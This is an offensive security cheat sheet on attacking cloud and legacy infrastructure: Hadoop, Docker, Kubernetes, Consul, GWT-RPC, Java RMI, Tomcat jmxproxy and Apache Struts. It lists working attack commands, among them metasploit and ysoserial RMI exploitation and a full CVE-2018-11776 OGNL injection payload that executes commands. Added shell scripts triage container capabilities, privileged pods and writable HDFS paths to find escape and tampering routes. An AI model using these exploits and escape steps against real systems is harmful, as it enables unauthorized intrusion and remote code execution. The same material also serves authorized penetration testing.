Exploiting Cloud Infrastructure
Hadoop
On the server machine (any host with a configured hadoop client):
$ hadoop fs -ls /
$ hadoop fs -ls -R /
$ hadoop fs -get /<PATH>
$ hadoop fs -cat /<PATH>
$ hadoop fs -put <LOCAL_FILE> /<PATH>
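After `hadoop fs -ls -R /` the practical question is where the current identity can actually `-put` (or tamper with job inputs). The POSIX shell function below is an added example, not code from the original page or from Hadoop: it reads a recursive listing and prints the paths writable by a given user, considering only the owner and "other" bits because group membership cannot be read from the listing. The sample listing is constructed.

```shell
#!/bin/sh
# Added example: given the output of `hadoop fs -ls -R /`, list the paths a
# given user can write to (candidate targets for `hadoop fs -put`).
# Group membership is unknown from the listing, so only owner and "other"
# bits are considered.

# hdfs_writable_paths USER   (listing on stdin)
# Listing format: perms replication owner group size date time path
hdfs_writable_paths() {
  awk -v u="$1" 'length($1) >= 10 && NF >= 8 {
    owner_w = substr($1, 3, 1)   # owner write bit
    other_w = substr($1, 9, 1)   # "other" write bit
    if (other_w == "w" || ($3 == u && owner_w == "w")) print $8
  }'
}

# Constructed sample listing (not from a real cluster):
SAMPLE_LS='drwxrwxrwt   - hdfs supergroup          0 2019-05-02 10:11 /tmp
drwxrwxrwx   - hdfs supergroup          0 2019-05-02 10:12 /user/shared
-rw-rw-rw-   3 hdfs supergroup       4096 2019-05-02 10:13 /user/shared/settings.xml
-rw-------   3 app  app              2048 2019-05-02 10:14 /user/app/keytabs/app.keytab
-rw-r--r--   3 hdfs supergroup      65536 2019-05-02 10:15 /user/hdfs/report.csv'

# Against a live cluster:  hadoop fs -ls -R / | hdfs_writable_paths "$(whoami)"
printf '%s\n' "$SAMPLE_LS" | hdfs_writable_paths app
```

Paths in the listing are taken as the eighth whitespace-separated field, so HDFS paths containing spaces would be truncated; the sticky bit on /tmp does not block creating new files there, which is why it is still reported.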
Docker
Useful commands:
- List containers:
$ docker ps
- List images:
$ docker images
By default, Docker containers are “unprivileged” and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a “privileged” container is given access to all devices (see the documentation on cgroups devices).
When the operator executes
$ docker run --privileged ...
Docker enables access to all devices on the host, disables the default seccomp profile and relaxes the AppArmor or SELinux configuration, so the container gets nearly the same access to the host as processes running outside containers. By contrast,
$ docker run --rm -it --cap-add=ALL $CMD
only grants the container every Linux capability; it does not by itself expose host devices or switch off the seccomp and AppArmor profiles, although CAP_SYS_ADMIN and friends are frequently enough to escape anyway.
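Once inside a container, the quickest way to tell whether it was started with --privileged or --cap-add=ALL is to decode the effective capability mask the kernel exposes in /proc/self/status. The POSIX shell snippet below is an added example, not code from the original page or from Docker; the capability bit numbers come from linux/capability.h, and the two reference masks are quoted as constants (00000000a80425fb is Docker's default unprivileged set, 000001ffffffffff is every capability on a recent kernel).

```shell
#!/bin/sh
# Added example: decode the CapEff bitmask from /proc/self/status to see
# whether the container we landed in is "privileged"-like. Bit numbers are
# from linux/capability.h; the two sample masks are reference constants.

# cap_has HEXMASK BIT -> succeeds if BIT is set in the hex capability mask
cap_has() {
  [ "$(( 0x$1 >> $2 & 1 ))" -eq 1 ]
}

# dangerous_caps HEXMASK -> prints the escape-relevant capabilities present
dangerous_caps() {
  for entry in 2:CAP_DAC_READ_SEARCH 12:CAP_NET_ADMIN 16:CAP_SYS_MODULE \
               17:CAP_SYS_RAWIO 19:CAP_SYS_PTRACE 21:CAP_SYS_ADMIN; do
    if cap_has "$1" "${entry%%:*}"; then printf '%s\n' "${entry#*:}"; fi
  done
}

# current_capeff -> effective capability mask of this shell (Linux only)
current_capeff() {
  awk '/^CapEff:/ { print $2 }' /proc/self/status
}

# Reference values (Docker defaults, quoted here as constants):
DOCKER_DEFAULT_CAPEFF=00000000a80425fb   # default cap set of an unprivileged container
PRIVILEGED_CAPEFF=000001ffffffffff       # every capability set (41 caps, Linux >= 5.8)

# Stand-alone demo: report on the current process when /proc is available.
if [ -r /proc/self/status ]; then
  mask=$(current_capeff)
  if [ -n "$mask" ]; then
    printf 'CapEff=%s\n' "$mask"
    if [ -z "$(dangerous_caps "$mask")" ]; then
      echo "no escape-relevant capabilities (default unprivileged container or plain user)"
    else
      dangerous_caps "$mask"
    fi
  fi
fi
```

A mask equal to the default set means the usual kernel-device and mount escapes are off the table; a mask with CAP_SYS_ADMIN set, even without --privileged, is the point at which checking for writable /dev and cgroup paths becomes worthwhile.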
Kubernetes
Useful commands:
- Cluster endpoints:
$ kubectl cluster-info
- Open a shell in a container:
$ kubectl exec -it <POD-NAME> -c <CONTAINER-NAME> -- bash
- List pods (add -A for all namespaces):
$ kubectl get pods
- List the API groups and versions the API server serves:
$ kubectl get apiservices
- Get a Service (here the one named hostnames, as in the Kubernetes debugging docs):
$ kubectl get svc hostnames
- Check permissions (--as impersonates another user; without it the check is for the current identity):
$ kubectl auth can-i list secrets --namespace dev --as dave
Some paths:
$ curl -k https://$SERVER:8443/apis
Get all pod paths (selfLink was removed from API objects in Kubernetes 1.24; on newer clusters build the path from metadata.namespace and metadata.name instead):
$ (curl http://$SERVER:$PORT/api/v1/pods | grep selfLink) 2> /dev/null | cut -d'"' -f4
If the kubectl API proxy is running (this is kubectl proxy, unrelated to the kube-proxy component on every node)
$ kubectl proxy &
we can also query the API on 127.0.0.1:8001 with the proxy's credentials:
- Execute commands inside a container. The exec endpoint is a streaming endpoint and expects an Upgrade to SPDY or WebSocket, so a plain curl gets "Upgrade request required"; the path is the one kubectl exec calls:
$ curl -X POST "http://127.0.0.1:8001/api/v1/namespaces/$NAMESPACE/pods/$POD/exec?command=/bin/id&container=$CONTAINER&stdin=false&stdout=true&stderr=true&tty=false"
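With exec rights, the pods worth targeting are those that run privileged or share the node's PID or network namespace. The POSIX shell snippet below is an added example, not code from the original page or from the Kubernetes project: it feeds a `kubectl get pods -A -o custom-columns=...` listing through awk and reports the risky ones. The column names, the sample output and the pod names are constructed; kubectl prints `<none>` for fields that are unset.

```shell
#!/bin/sh
# Added example: triage `kubectl get pods` output for pods that are privileged
# or share the host PID/network namespaces, which is what an attacker with
# kubectl exec rights would pick to break out to the node.

# Column spec for kubectl (custom-columns prints <none> for unset fields):
COLUMNS='NS:.metadata.namespace,NAME:.metadata.name,PRIV:.spec.containers[*].securityContext.privileged,HOSTPID:.spec.hostPID,HOSTNET:.spec.hostNetwork'

# risky_pods   (custom-columns output on stdin) -> "ns/name: reasons"
risky_pods() {
  awk 'NR > 1 {
    reasons = ""
    if ($3 ~ /true/)  reasons = reasons " privileged"   # any container privileged
    if ($4 == "true") reasons = reasons " hostPID"
    if ($5 == "true") reasons = reasons " hostNetwork"
    if (reasons != "") print $1 "/" $2 ":" reasons
  }'
}

# Against a live cluster (needs list rights on pods cluster-wide):
live_risky_pods() {
  kubectl get pods -A -o custom-columns="$COLUMNS" | risky_pods
}

# Constructed sample output (no live cluster involved):
SAMPLE_PODS='NS            NAME                    PRIV     HOSTPID   HOSTNET
kube-system   kube-proxy-abc12        <none>   <none>    true
default       web-6d4cf56d49-xyz      <none>   <none>    <none>
monitoring    node-exporter-9k2lm     true     true      true
dev           debug-shell             true     <none>    <none>'

printf '%s\n' "$SAMPLE_PODS" | risky_pods
```

A pod that is both privileged and hostPID is the classic escape path (nsenter into PID 1 on the node); hostNetwork alone is mostly interesting for reaching node-local services such as the kubelet.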
Exploit for CVE-2018-1002105
In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
minikube
Never use in production environments! It mounts the host's /Users into the guest VM at /Users (on macOS), so anything that reaches the VM filesystem reaches the host's home directories. Easy jail evasion.
How to open an ssh session in the guest:
$ minikube ssh
Google GWT-RPC
Get all RPC endpoints leaked from X32.cache.js, where X32 is the 32-character string taken from the page that makes the call:
$ for i in `perl URLSUCKER -f X32.cache.js | strings -n 32`; do curl -Ik https://$SERVER:$PORT/$PATH/$i.gwt.rpc; done
More info: http://www.owasp.org/images/7/77/Attacking_Google_Web_Toolkit.ppt
Hashicorp Nomad
Hashicorp Consul
- List cluster members (the HTTP API listens on 8500 by default):
$ consul members -http-addr http://$HOST:8500
- Deny traffic between two services with a Connect intention (service-to-service ACL):
$ consul intention create -deny web database
Jenkins RCE
Legacy systems
Java RMI
Nmap will recognize it as:
XXXX/tcp open rmiregistry Java RMI
Exploiting RMI
- With nmap:
root # nmap --script=rmi-vuln-classloader -p 1099 $IP
root # nmap --script=rmi-dumpregistry -p 1099 $IP
- With metasploit:
msf> use exploit/multi/misc/java_rmi_server
- With ysoserial (deserialization through the registry; the CommonsCollections1 chain needs a vulnerable commons-collections on the server's classpath):
$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit $IP 1099 CommonsCollections1 calc.exe
- With the Java Monitoring and Management Console, which connects to exposed JMX/RMI endpoints and shows OS and application parameters:
$ jconsole
WinRM
Tomcat
jmxproxy
The JMX Proxy Servlet is a lightweight proxy to get and set the tomcat internals. (Or any class that has been exposed via an MBean) Its usage is not very user friendly but the UI is extremely helpful for integrating command line scripts for monitoring and changing the internals of tomcat. You can do two things with the proxy:
- get information
- set information
Source: https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#What_is_JMX_Proxy_Servlet
Paths (all require the manager-jmx role on the Tomcat manager application):
http://$SERVER/manager/jmxproxy
http://$SERVER/manager/jmxproxy/?qry=STUFF
http://$SERVER/manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
http://$SERVER/manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
http://$SERVER/manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
http://$SERVER/manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
http://$SERVER/manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
http://$SERVER/manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
http://$SERVER/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
Apache Struts
CVE-2017-5638 Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution (RCE)
CVE-2017-9805 Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution (RCE)
Test lab deployment:
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
CVE-2018-11776
POC (OGNL injection through the namespace part of the URL; the Windows branch passes 'c' rather than '/c', so as written it only works against Linux targets):
$ curl http://$IP/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
Decoded query:
http://$IP/${(#_memberAccess['allowStaticMethodAccess']=true).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}/help.action
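Both the jmxproxy bean names in the Tomcat section and the Struts payload above depend on percent-encoding of characters that are not URL-safe (`:` `=` `,` in ObjectNames, `$ { ( # ' @` in OGNL). The two POSIX shell functions below are an added example, not code from the original page, Tomcat or Struts: they percent-encode and percent-decode a string using only sh and awk, so a tester can build a jmxproxy query from a plain MBean name and read back a captured payload. The Tomcat host name is hypothetical; the sample inputs are copied from the paths on this page.

```shell
#!/bin/sh
# Added example: percent-encode / percent-decode helpers for building jmxproxy
# queries and reading captured Struts OGNL payloads. POSIX sh + awk only.

# urlencode STRING: percent-encode every byte outside the RFC 3986 unreserved set.
urlencode() {
  printf '%s' "$1" | LC_ALL=C awk '
    BEGIN { for (i = 1; i < 256; i++) ord[sprintf("%c", i)] = i }
    {
      out = ""
      for (i = 1; i <= length($0); i++) {
        c = substr($0, i, 1)
        if (c ~ /[A-Za-z0-9._~-]/) out = out c
        else out = out sprintf("%%%02X", ord[c])
      }
      printf "%s", out
    }'
}

# urldecode STRING: turn each %HH back into its byte; malformed % sequences are kept.
urldecode() {
  printf '%s' "$1" | LC_ALL=C awk '
    BEGIN { hex = "0123456789ABCDEF" }
    {
      s = $0; out = ""
      while ((i = index(s, "%")) > 0) {
        out = out substr(s, 1, i - 1)
        h = toupper(substr(s, i + 1, 2))
        hi = index(hex, substr(h, 1, 1)); lo = index(hex, substr(h, 2, 1))
        if (length(h) == 2 && hi && lo) {
          out = out sprintf("%c", (hi - 1) * 16 + lo - 1)
          s = substr(s, i + 3)
        } else {
          out = out "%"            # not a valid escape, keep the literal %
          s = substr(s, i + 1)
        }
      }
      printf "%s", out s
    }'
}

# jmxproxy_get SERVER OBJECTNAME ATTRIBUTE: build a manager jmxproxy "get" URL
# from a raw MBean ObjectName (the server is not encoded, the name is).
jmxproxy_get() {
  printf 'http://%s/manager/jmxproxy/?get=%s&att=%s\n' \
    "$1" "$(urlencode "$2")" "$(urlencode "$3")"
}

# Sample input copied from the CVE-2018-11776 PoC path above:
STRUTS_PREFIX='%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29'

# Demo (hypothetical host; nothing is contacted):
jmxproxy_get tomcat.example:8080 'Catalina:type=Valve,name=ErrorReportValve,host=localhost' debug
urldecode "$STRUTS_PREFIX"; echo
```

The decoder treats the input as a single line, which is what a URL is; use it on a whole captured request path rather than on a log file.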